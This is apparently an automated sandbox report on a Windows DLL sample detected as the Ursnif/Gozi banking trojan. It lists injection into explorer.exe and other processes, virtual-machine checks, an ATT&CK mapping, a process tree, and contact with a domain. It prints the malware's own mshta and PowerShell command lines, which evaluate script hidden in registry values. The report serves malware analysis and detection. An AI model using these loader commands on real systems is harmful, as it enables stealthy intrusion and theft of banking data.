            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5040
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3816
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dll
            Source: C:\Windows\System32\loaddll32.exe TID: 6784 Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5644 Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00458A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00458A61
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00443DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_00443DEE
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00456E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_00456E86
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00461C05 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_00461C05
            Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: explorer.exe, 00000021.00000000.416282562.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: RuntimeBroker.exe, 00000026.00000000.426595121.000001FC1125D000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000021.00000000.419810588.000000000F540000.00000004.00000001.sdmp Binary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
            Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000021.00000000.416616330.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: mshta.exe, 00000019.00000003.369765641.0000022A92B49000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t
            Source: explorer.exe, 00000021.00000000.416803055.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
            Source: explorer.exe, 00000021.00000000.411212416.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: mshta.exe, 00000019.00000003.369765641.0000022A92B49000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: explorer.exe, 00000021.00000000.416074813.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0045735C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0045735C
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_3_0043040A mov eax, dword ptr fs:[00000030h] 0_3_0043040A
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_3_004300B7 mov esi, dword ptr fs:[00000030h] 0_3_004300B7
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0045DA66 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,0_2_0045DA66

            HIPS / PFW / Operating System Protection Evasion:

            Allocates memory in foreign processes
            Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: 1060000 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000 protect: page execute and read and write
            Changes memory attributes in foreign processes to executable or writable
            Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Compiles code for process injection (via .Net compiler)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.0.cs
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 736E1580
            Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580
            Source: C:\Windows\explorer.exe Thread created: unknown EIP: 736E1580
            Source: C:\Windows\explorer.exe Thread created: unknown EIP: 736E1580
            Source: C:\Windows\explorer.exe Thread created: unknown EIP: 736E1580
            Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 736E1580
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 10AE000 value: 00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 7FFB736E1580 value: EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 1280000 value: 80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 7FFB736E1580 value: 40
            Maps a DLL or memory area into another process
            Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 4672
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3388
            Source: C:\Windows\explorer.exe Thread register set: target process: 3668
            Source: C:\Windows\explorer.exe Thread register set: target process: 4376
            Source: C:\Windows\explorer.exe Thread register set: target process: 4588
            Source: C:\Windows\explorer.exe Thread register set: target process: 5964
            Source: C:\Windows\System32\control.exe Thread register set: target process: 5036
            Writes to foreign memory regions
            Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6578712E0
            Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 1060000
            Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6578712E0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 10AE000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFB736E1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 1280000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFB736E1580
            Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 6E40E02000
            Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000
            Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
            Source: C:\Windows\System32\control.exe Process created: unknown unknown
            Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: explorer.exe, 00000021.00000000.400884078.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmp Binary or memory string: Program Manager
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmp Binary or memory string: Progman
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmp Binary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00454270 cpuid 0_2_00454270
            Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_737519DA
            Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044190E CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,0_2_0044190E
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_737513E4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_737513E4
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044B868 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,0_2_0044B868
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_73751371 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_73751371
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match, File source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, File source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara match, File source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara match, File source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY

            Remote Access Functionality:

            Yara detected Ursnif

            Mitre Att&ck Matrix

            Initial Access: Valid Accounts 1; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
            Execution: Windows Management Instrumentation 2; Native API 1; Command and Scripting Interpreter 12; PowerShell 1; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
            Persistence: DLL Side-Loading 1; Valid Accounts 1; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
            Privilege Escalation: DLL Side-Loading 1; Valid Accounts 1; Access Token Manipulation 1; Process Injection 813; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
            Defense Evasion: Obfuscated Files or Information 1; DLL Side-Loading 1; Masquerading 1; Valid Accounts 1; Access Token Manipulation 1; Virtualization/Sandbox Evasion 3; Process Injection 813; Indicator Removal from Tools; Masquerading; Invalid Code Signature
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
            Discovery: System Time Discovery 1; Account Discovery 1; File and Directory Discovery 3; System Information Discovery 45; Query Registry 1; Security Software Discovery 11; Virtualization/Sandbox Evasion 3; Process Discovery 3; Application Window Discovery 1; System Owner/User Discovery 1
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
            Collection: Archive Collected Data 1; Email Collection 1; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
            Command and Control: Ingress Tool Transfer 3; Encrypted Channel 1; Non-Application Layer Protocol 3; Application Layer Protocol 3; Proxy 1; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact

            Behavior Graph

            Behavior Graph ID: 322295 Sample: onerous.tar.dll Startdate: 24/11/2020 Architecture: WINDOWS Score: 100

            Start node signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Antivirus / Scanner detection for submitted sample; 8 other signatures

            Process tree (processes started from the start node, with the signatures, dropped files and network contacts attached to each node):

            • mshta.exe 19: Suspicious powershell command line found
                • powershell.exe 2 32: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Compiles code for process injection (via .Net compiler)
                  Dropped: C:\Users\user\AppData\Local\...\jery0dbp.0.cs (UTF-8); C:\Users\user\AppData\...\1453igkk.cmdline (UTF-8)
                    • explorer.exe (injected): Changes memory attributes in foreign processes to executable or writable; Writes to foreign memory regions; Allocates memory in foreign processes; 4 other signatures
                      Contacts: c56.lepini.at
                        • RuntimeBroker.exe (injected)
                    • csc.exe: dropped C:\Users\user\AppData\Local\...\1453igkk.dll (PE32)
                        • cvtres.exe
                    • csc.exe: dropped C:\Users\user\AppData\Local\...\jery0dbp.dll (PE32)
                        • cvtres.exe
                    • conhost.exe
            • loaddll32.exe 1: Detected Gozi e-Banking trojan; Writes to foreign memory regions; Allocates memory in foreign processes; 5 other signatures
                • control.exe: Changes memory attributes in foreign processes to executable or writable; Maps a DLL or memory area into another process; Creates a thread in another existing process (thread injection)
            • iexplore.exe 1 55: contacts 192.168.2.1 (unknown, unknown)
                • iexplore.exe 29
                • iexplore.exe 30
            • iexplore.exe 2 82
